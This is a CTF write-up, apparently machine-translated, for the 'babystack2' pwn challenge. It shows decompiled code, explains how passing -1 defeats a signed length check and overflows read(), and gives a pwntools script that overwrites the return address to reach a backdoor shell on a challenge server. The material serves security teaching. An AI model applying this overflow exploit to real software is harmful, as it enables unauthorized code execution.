【CTF】bjdctf_ 2020_ babystack2

Topic analysis

Decompile , Look for loopholes

main function ：

undefined8 main(void)
{
    
  undefined local_18 [12];
  uint local_c;
  
  setvbuf(stdout,(char *)0x0,2,0);
  setvbuf(stdin,(char *)0x0,1,0);
  local_c = 0;
  puts("**********************************");
  puts("* Welcome to the BJDCTF! *");
  puts("* And Welcome to the bin world! *");
  puts("* Let\'s try to pwn the world! *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf(&DAT_004009c1,&local_c);
  if (10 < (int)local_c) {
    
    puts("Oops,u name is too long!");
                    /* WARNING: Subroutine does not return */
    exit(-1);
  }
  puts("[+]What\'s u name?");
  read(0,local_18,(ulong)local_c);
  return 0;
}

backdoor function :

undefined8 backdoor(void)
{
    
  system("/bin/sh");
  return 1;
}

The meaning of the topic is obvious , Backdoor functions have been provided , As long as you can jump over it .
Look again main function ,read Function is obviously a utilization point , Using variables local_c Can create overflow .
Of course , It's not that simple , There is a length limit ahead

if (10 < (int)local_c)

however , This is also simple , Isn't it ？ Integer overflow , A whole negative number , It just becomes ~~~
The fact proved that , The idea is completely correct , But the process is too tortuous , Briefly describe ：
Native overflow will fail , stay ubuntu On , Input -1,read Will return directly to ; stay windows Experiment , Input -1,read Pop up window , Tips
buf len < INT_MAX Condition not satisfied , This is obvious ,read There are input restrictions . Studied for a long time , No solution found , Because of the length limit ,
Negative numbers must be used , Otherwise, it cannot overflow , And even if INT_MIN, Convert to unsigned number , Still 2147483648, still > INT_MAX; At that time
I doubt life .

Their thinking

Thinking is the process of analyzing the above topic , Absolutely right , Take the target directly and verify it OK Of ,-1 Can exceed the length limit , meanwhile read Don't complain ( No tears to cry )

from pwn import *
sh = connect("node4.buuoj.cn",27462)
sh.recvuntil("name:\n")
print("recv name length")
sh.sendline('-1'.encode())
print("send name length")
sh.recvline()

pad = 'A'*24
payload = pad.encode() + p64(0x00400726)
sh.sendline(payload)

sh.interactive()

The consequences of not being able to verify locally , The overflow length is guessed .

summary

When there is nothing wrong with your thinking , Test the target machine in time . But adjusting this machine is still interesting , Although the final result was not found , such as ubuntu On , Wrote a test demo, Remove length verification , result read As long as it is not greater than 3652 Is no problem , Over time errno Will report Bad address, Follow windows It's not the same , however 3652 This value doesn't make any sense , Doubt life again ~~~ After work, don't worry , There is a tone in the back glibc Take a look when you have a chance .